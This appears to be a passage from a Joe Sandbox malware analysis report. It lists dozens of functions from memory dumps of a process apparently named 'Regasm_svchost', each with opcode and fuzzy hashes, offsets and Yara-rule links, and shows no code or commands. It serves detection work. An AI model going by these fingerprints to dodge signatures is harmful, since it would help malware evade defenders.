Opcode ID: ff6622e3897cdec89bc735ed120ddf984f02611ffa46272b5b925c2c3b03f3af
Instruction ID: 8dcd168071a31ef24ecee0921fb6f7a4a1d97f40cba362564c733035ca34fb30
Opcode Fuzzy Hash: ff6622e3897cdec89bc735ed120ddf984f02611ffa46272b5b925c2c3b03f3af
Instruction Fuzzy Hash: 96016374D053298BCB24AB64C989A9DFBB1FB48304F2185D6A819A3750DB349E808F01

Uniqueness

Uniqueness Score: -1.00%

Function 001D3346 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c13f34937b8fd243bbaddf4b09b85a0b489ffc9dd33167f42dc7e045d292128a
Instruction ID: 0c3ed54254c622b51f48163deb1fd7a32d63e1f942ac5180c103b8427b21ac97
Opcode Fuzzy Hash: c13f34937b8fd243bbaddf4b09b85a0b489ffc9dd33167f42dc7e045d292128a
Instruction Fuzzy Hash: 73F0BB70A052019FC704CF35DC8999AB7B2BF8D301F6485A1D41AE3325DB30AA45DF10

Uniqueness

Uniqueness Score: -1.00%

Function 001D57B0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6f471f55c09effc73fe3b73b08fdef5ce2e9ea6e3d4a21c6cf59b561590340
Instruction ID: 35e7521a8bd3441cf3169d0544e3a6e615258862e8a58caedd6687cef659c4b1
Opcode Fuzzy Hash: 9c6f471f55c09effc73fe3b73b08fdef5ce2e9ea6e3d4a21c6cf59b561590340
Instruction Fuzzy Hash: 93F03A74C08348AFCB42DFA4D8406ADBFB1FF09300F11859AE854E7362D3745A54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001D304B Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 326b1a05b9bff972bd0fe77234893289032fd8e61aeba6af357b26daeab54393
Instruction ID: 0c3b6420bbd0e0ef75aff73fd0fec1fa9ed68e9a24b22f6c58be52082e185c29
Opcode Fuzzy Hash: 326b1a05b9bff972bd0fe77234893289032fd8e61aeba6af357b26daeab54393
Instruction Fuzzy Hash: BB017534911118CFCB64CB14D88869DB7B2EB48315F2186D5E419A7764DB71AEC1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D107A Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea945d9aeaad158418b675321bdddd21c5ac2d43e9668d609cfa1458f548e431
Instruction ID: 4b5f2b42484cee17babbe3a0929a50e818e044ad934fbe4fbe52a0db1b100134
Opcode Fuzzy Hash: ea945d9aeaad158418b675321bdddd21c5ac2d43e9668d609cfa1458f548e431
Instruction Fuzzy Hash: 5B01D6789052589FCB64DB54C988B9DF7B2AB88300F60C5D6D809A7354C775AFC1CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00A324F9 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a662a918d3a8eded47b575021600e9db7c02c49e54b32dc09849195c0d6b418
Instruction ID: f5639b367c0b8b046f706f1dad7ca5fadba18fbf2499c7264bc3d54ab5ffac94
Opcode Fuzzy Hash: 6a662a918d3a8eded47b575021600e9db7c02c49e54b32dc09849195c0d6b418
Instruction Fuzzy Hash: 66F03034909248AFCF02CFA5D94069CBF71EF89310F14C1AAE945D7391C3328A16DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00A31501 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181f6273ae5781f26d695037c35cf82924e4d0638ee9dc503c1f8860f39ebb16
Instruction ID: d966d196e81143752bb5f1dd962a498733c8b088b9bed6f02f41a819c7488b92
Opcode Fuzzy Hash: 181f6273ae5781f26d695037c35cf82924e4d0638ee9dc503c1f8860f39ebb16
Instruction Fuzzy Hash: 75013C34908268CFCB60DF24CC48ADABBB0FF55314F1085E984199B292C7325A86DF40

Uniqueness

Uniqueness Score: -1.00%

Function 001D5B70 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3da19624dbf694ae3734ad9b0cba6bfe9c115b330893f32166604b605103b68a
Instruction ID: 2708f7c3e667b0d75417f38eceff745fcdddcd3f556dc6b3fbe564f1dffcb69d
Opcode Fuzzy Hash: 3da19624dbf694ae3734ad9b0cba6bfe9c115b330893f32166604b605103b68a
Instruction Fuzzy Hash: 8BF0F874C093989FC742DFB898402AEBFB5AF06200F1546DBD854D7252D7705A49CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001D5769 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c6294b0fbbd76f9b26f7b5a36cbc6555ae36e0e66c01fa0d9a9be25fb4b6348
Instruction ID: e48c8920c0e3ed94966eb3287d46ea554a9198d4f9e655b4070249cc8effea8c
Opcode Fuzzy Hash: 9c6294b0fbbd76f9b26f7b5a36cbc6555ae36e0e66c01fa0d9a9be25fb4b6348
Instruction Fuzzy Hash: AFF0F2749093889FC742DFB8E84568CBFB0AF0A200F1541EAD444DB3A2D6389A44CF62

Uniqueness

Uniqueness Score: -1.00%

Function 001D181B Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c1e34b818c7b9d2ee3fb1ea13e87d090638cfcf44ae663fb3d047f58424286
Instruction ID: 273b0686a60fb40b0120debaaca333c761b68be5acd8df8f6211c8cc6a80cc1d
Opcode Fuzzy Hash: e4c1e34b818c7b9d2ee3fb1ea13e87d090638cfcf44ae663fb3d047f58424286
Instruction Fuzzy Hash: 27F0F0328142089BCB04EFB4C9895ECBB70EF55300F1046DAE88762229EB304786CF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D5A20 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37507e60c3180ba38522717edea7444afda13e46d74d754d3b1ffe3862ef088f
Instruction ID: 231514090dedfed1ef0543a22a329d918ee40b0cc8d5f91f9c55466390bed8bd
Opcode Fuzzy Hash: 37507e60c3180ba38522717edea7444afda13e46d74d754d3b1ffe3862ef088f
Instruction Fuzzy Hash: F3F08C349093889FC742DFB8C444648BFF4EF0A600F0681EAD858D7762E3349A04CB41

Uniqueness

Uniqueness Score: -1.00%

Function 001D4D21 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffe0ba6f0bd7a4a502c216f6031a0c3a8fe5a0c75f7caa75911dc616111616a8
Instruction ID: 7e789fad0b9a3b978ff70b0e8cea450b2bb74815b1eb01f3f3e284111d70a9ed
Opcode Fuzzy Hash: ffe0ba6f0bd7a4a502c216f6031a0c3a8fe5a0c75f7caa75911dc616111616a8
Instruction Fuzzy Hash: EAF08C70D083489FCB02DFB8880039DBFB5AF06200F1085EAD454E73A2D7385A44CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A31477 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 595ed14f11181c7d7c448aa51007cfefd84b6a050a43200799c63f30f26e84d3
Instruction ID: 60df09626a3c96392f2bd7148bc8ec9c31e7410e13c86fbec5c4b57efa0eadcd
Opcode Fuzzy Hash: 595ed14f11181c7d7c448aa51007cfefd84b6a050a43200799c63f30f26e84d3
Instruction Fuzzy Hash: A3F03475905218CFEB24CF50CC40BE9B7B4BF5A304F0481DAE048A7291D3755A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 001D54AF Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23903f6a108580185e44f4f5bf9dd0e59ec469a9e753fcefd57d52a6aa54c10f
Instruction ID: e6081f963e1d7e46a2f3317012b384c5fff74a7468deffbc0654340533a3e074
Opcode Fuzzy Hash: 23903f6a108580185e44f4f5bf9dd0e59ec469a9e753fcefd57d52a6aa54c10f
Instruction Fuzzy Hash: 58F065309083446FC702EFB49C0038CBFB09F16200F5140EAD544D7762D7309E99C752

Uniqueness

Uniqueness Score: -1.00%

Function 001D5A68 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1672bf40e95828292326d0d070d215b0a39997de23da6fd79e70e591d25b92b
Instruction ID: 797977de4a09e790f052d8bb212b973399290a6ecb0714a9b17fc72368d2f87f
Opcode Fuzzy Hash: c1672bf40e95828292326d0d070d215b0a39997de23da6fd79e70e591d25b92b
Instruction Fuzzy Hash: 25F0397480E3948ECB079BB4945415C7FB1AF47204B2982EFD044972A3D6384A48DB62

Uniqueness

Uniqueness Score: -1.00%

Function 001D2C59 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32c01732f47acfc7c5023a8fca4d07091dfd88c2e67e4a360de8bcc68916a9be
Instruction ID: 45ea2ffd3e3b068733cfa97b7175e928ef74101c5e8d5812f4297c8fe6976dcb
Opcode Fuzzy Hash: 32c01732f47acfc7c5023a8fca4d07091dfd88c2e67e4a360de8bcc68916a9be
Instruction Fuzzy Hash: 19F01774A012159FC724DB68D999B9AB7F1EB8E300F6081E5941DA7355CB309E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00A326FF Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2673920624067f1ae0e6ec8cd93cbafeb682bcdcceaa5ab52d8d655fc48f6ed4
Instruction ID: f21fea0df5c05bc697efc0aa1d426df20ccfcdf6a7d034ef2e61d737622bee97
Opcode Fuzzy Hash: 2673920624067f1ae0e6ec8cd93cbafeb682bcdcceaa5ab52d8d655fc48f6ed4
Instruction Fuzzy Hash: 52F01C74809244AFCB06DFA4D45069CFFB1AF46210F1481EBD84497761C6368A46DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A30C20 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377e829898afab85e158a3b73cb2dd5ff161d0d491129e37137c986dd391c57d
Instruction ID: da8e0b4aa39bc6b2f54250f626c0aed30602d79797af95f6b0fd9d3ca4b3885d
Opcode Fuzzy Hash: 377e829898afab85e158a3b73cb2dd5ff161d0d491129e37137c986dd391c57d
Instruction Fuzzy Hash: 80F05E74D08248AFCB42DFA8D451A9CFFB0AB49304F14C1EED90893342D2364A16CF41

Uniqueness

Uniqueness Score: -1.00%

Function 00A3127F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61ddce8b99bd32de26b41a2914929f6097f398f7236168625285f2bc113f04b
Instruction ID: c87854fcfcaef70cc9219842af1e25e8532ddd508e5eac3f0e18e589d4632121
Opcode Fuzzy Hash: e61ddce8b99bd32de26b41a2914929f6097f398f7236168625285f2bc113f04b
Instruction Fuzzy Hash: 62F01575D04218DFDB54CF95CC40BE9BBF8BB58304F1480AAA409E7281DB34AB8ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 001D4001 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79c65ef0a0e1037191add77ebe21e9cc504a24aa82e379880628ca5ef9342656
Instruction ID: 9ef10c19e1f67660a613ccdf407304c795603cf50aa834cd55833bf472593746
Opcode Fuzzy Hash: 79c65ef0a0e1037191add77ebe21e9cc504a24aa82e379880628ca5ef9342656
Instruction Fuzzy Hash: 1AF03030C0D2849FCB42DBB8885829C7FB09F06201F1505EEC545D72A2EA305954DB52

Uniqueness

Uniqueness Score: -1.00%

Function 001D135E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 407af530ad659f8c515dd0176548cc307b38522deb5f29f020dd0b91dcdba909
Instruction ID: d2846fa6d11b9496effd623c1daab18e05e7714dfb531a6aba74337438f20fe2
Opcode Fuzzy Hash: 407af530ad659f8c515dd0176548cc307b38522deb5f29f020dd0b91dcdba909
Instruction Fuzzy Hash: 59F097B4E092199FCB24DF64CD88A99F7B1EB48301F2185E6E819A3360D7319E80DF51

Uniqueness

Uniqueness Score: -1.00%

Function 001D0558 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8389da6b00698bec3c585ea4f385f547abbf3791ad76c7775891eb0b968798ce
Instruction ID: eeb490d7a20dd65fd0f461ffe9075afc3dc22f88e0ea20b3900021b81c3639af
Opcode Fuzzy Hash: 8389da6b00698bec3c585ea4f385f547abbf3791ad76c7775891eb0b968798ce
Instruction Fuzzy Hash: 48E08C2054E3E42FD70397B15C046563F688B03100B0601DBE884CB6A3DA244A58D7F6

Uniqueness

Uniqueness Score: -1.00%

Function 00A30518 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1965c6ce4cf24787037d38cd768452094a5717459e798be81a390c18749a8823
Instruction ID: ab68e59916d93836a97861458e28d976e283ca6be55b2759e084f3fe0937639d
Opcode Fuzzy Hash: 1965c6ce4cf24787037d38cd768452094a5717459e798be81a390c18749a8823
Instruction Fuzzy Hash: A2E09270809288AFCB02DBF49800A9E7BB0EF42204F1142EFD909D7252DA340A19DF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A31110 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8553baebaa6c86a074e09e9c6f83a8839fa269229ced6a613fdb0f7deb29aa2
Instruction ID: 95083e4470b30c4a172018e3592866aae797e3135f99072abe39e5727b126ab1
Opcode Fuzzy Hash: f8553baebaa6c86a074e09e9c6f83a8839fa269229ced6a613fdb0f7deb29aa2
Instruction Fuzzy Hash: 14F065748082489FCB12DFB4E8457DCBF70AF96314F14819FD94457752D6314A51DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A318CE Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505bdc41752e770523d84225ea0f85cfbb94507f8bf32d7a35b5ffeffd4f7726
Instruction ID: 0e5bd2ba82f84cb961ef804e57870875348c17eca7e14ff871032f163572df5a
Opcode Fuzzy Hash: 505bdc41752e770523d84225ea0f85cfbb94507f8bf32d7a35b5ffeffd4f7726
Instruction Fuzzy Hash: 5AF03974808118DFDB50DF20C848BE9BBF4FB19304F0481D9D40AAB291CB755B8ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A32508 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88526f2d0c69cec875703a1911924da87a9499e820814e04c24aef4e378a53a2
Instruction ID: 6e8fc03cffaf90f2c9997b5dc62d3802a79bfb1822881d78197ad98c770b6896
Opcode Fuzzy Hash: 88526f2d0c69cec875703a1911924da87a9499e820814e04c24aef4e378a53a2
Instruction Fuzzy Hash: 68F0A53590420CEFCB05DF94D940A9DBBB5FB48310F14C5AAED14A7351C7329A61EF91

Uniqueness

Uniqueness Score: -1.00%

Function 001D5908 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 225e0d340fca9c4a5ce5214d5f6178b20166b23f9e9fda103e4f70fbc8e19045
Instruction ID: 00159490e694a8195b4a2c09c112a0f5d0ae0734aee16582f4734fe4450a7b14
Opcode Fuzzy Hash: 225e0d340fca9c4a5ce5214d5f6178b20166b23f9e9fda103e4f70fbc8e19045
Instruction Fuzzy Hash: 56E0C274D04208DFCB44EFA8D8846ADBBF4FF08304F1045AAE918E3320E7709A40CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001D5D52 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11a59fdd0e6c412b7a294e857ccfc2d29474eeedbf495029f0aa94e4d681e346
Instruction ID: 3c2d1e4315aad2284d992a5690df1d44cdc790e1fbcb4b6cbabb8b8871e9c418
Opcode Fuzzy Hash: 11a59fdd0e6c412b7a294e857ccfc2d29474eeedbf495029f0aa94e4d681e346
Instruction Fuzzy Hash: 5DE086B8308500DBF7082BA48968B3A2627DB4C704F104536E706D7BC0DB7A4BC18B27

Uniqueness

Uniqueness Score: -1.00%

Function 00A30048 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c03cbb4a7f7e1ad5f3c42339b5a1af7ba1716f84913cedf874eb60ce7b3264
Instruction ID: d07d80cdfc786f7d9e87b0802fccfd4e9353c77c94d987c1d336d7285e54d28e
Opcode Fuzzy Hash: f0c03cbb4a7f7e1ad5f3c42339b5a1af7ba1716f84913cedf874eb60ce7b3264
Instruction Fuzzy Hash: 9FE0E574E04208EFCB44DFA8D840A9DFBF1EB88300F10C1AAA908A3340D731AA52DF80

Uniqueness

Uniqueness Score: -1.00%

Function 001D5B30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde64508a27046f2385c9ca0e5f1197317a17a754dff93197fa5ebd52002360d
Instruction ID: fe45d5906fd95d383f34c859b1fd3802529c131f62c64a9a6cf2f33963700c36
Opcode Fuzzy Hash: bde64508a27046f2385c9ca0e5f1197317a17a754dff93197fa5ebd52002360d
Instruction Fuzzy Hash: C8E04F3044938C5FCB02DBB4AC442AC7FB5AF02208F1605EFD94893262E7355A58C352

Uniqueness

Uniqueness Score: -1.00%

Function 001D5C68 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89075ff5f668fed9b42dae83308303728eb7f6b9fd33aad39388c3ae80db44cd
Instruction ID: 1ad8a13df638e3788bd6a5b06b4377061a139a060fdc202adbe6d69426c6400a
Opcode Fuzzy Hash: 89075ff5f668fed9b42dae83308303728eb7f6b9fd33aad39388c3ae80db44cd
Instruction Fuzzy Hash: C1E0C232200214A78714BB8AE80488EB76AEFD8721300863BF609C7660CF705E0A87D6

Uniqueness

Uniqueness Score: -1.00%

Function 001D4D30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca7ae8ebfdee0741aac513e1a8c07d898e1c50e2c21f078c9a2e2364f4383b
Instruction ID: 667003938d464fddbdc2aed67c89748ec45b075d5e70b0386fda1598a144de7e
Opcode Fuzzy Hash: 43ca7ae8ebfdee0741aac513e1a8c07d898e1c50e2c21f078c9a2e2364f4383b
Instruction Fuzzy Hash: 42E0E570D04208DFCB44EFA8D8416ADBBB5EB44304F1085AA9818A3350D7309A80CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001D3F30 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.987793052.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105726d1ced4f124265e0033e8b7030619689efc1e3450f7f3ff16540c9dd0b1
Instruction ID: 24045dcdf73f900a43dcbfa67defe4105f42bd433af19ef72d520b603df46d68
Opcode Fuzzy Hash: 105726d1ced4f124265e0033e8b7030619689efc1e3450f7f3ff16540c9dd0b1
Instruction Fuzzy Hash: B2E04F70E0420CAFCB40DFE8D44569DF7B5EB48204F1081AAC92893350EB349A41CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A30488 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b8e7981a1b0fa538800478410b0134c35af528affb4f7d60c79322008bbaa3
Instruction ID: 84216ccfa16a8ce6963b21192c9023006c973d072a643ee489b37f236931323a
Opcode Fuzzy Hash: 98b8e7981a1b0fa538800478410b0134c35af528affb4f7d60c79322008bbaa3
Instruction Fuzzy Hash: 39E09A34409688EBCB12EFF0C900A8DBB70FF85204F0106BECA0887221EB350A54DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A32710 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c69bc987b576eb05a3bba6152177fdae8377889ebc1ef75a893337982dd0024
Instruction ID: 1f5f1613344cbe7b26fabf0d7606f73b63b9da0f7acb9bc7d4f3109a24f2b6ee
Opcode Fuzzy Hash: 3c69bc987b576eb05a3bba6152177fdae8377889ebc1ef75a893337982dd0024
Instruction Fuzzy Hash: 07E01234D04208EFCB05DFA8D840AACFBB0EB88300F10C1AAED44A3341D632AA52DF94

Uniqueness

Uniqueness Score: -1.00%

Function 00A31771 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.988197363.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a30000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da3a28087fb1a9f21ad7c934241cd80a5aa3fdf60829f8a8d0bbfb1aaa6c1592
Instruction ID: 0d3c9949e669b08e865138455d91c3e27382ee8778bc50ba6592682c3b4f2858
Opcode Fuzzy Hash: da3a28087fb1a9f21ad7c934241cd80a5aa3fdf60829f8a8d0bbfb1aaa6c1592
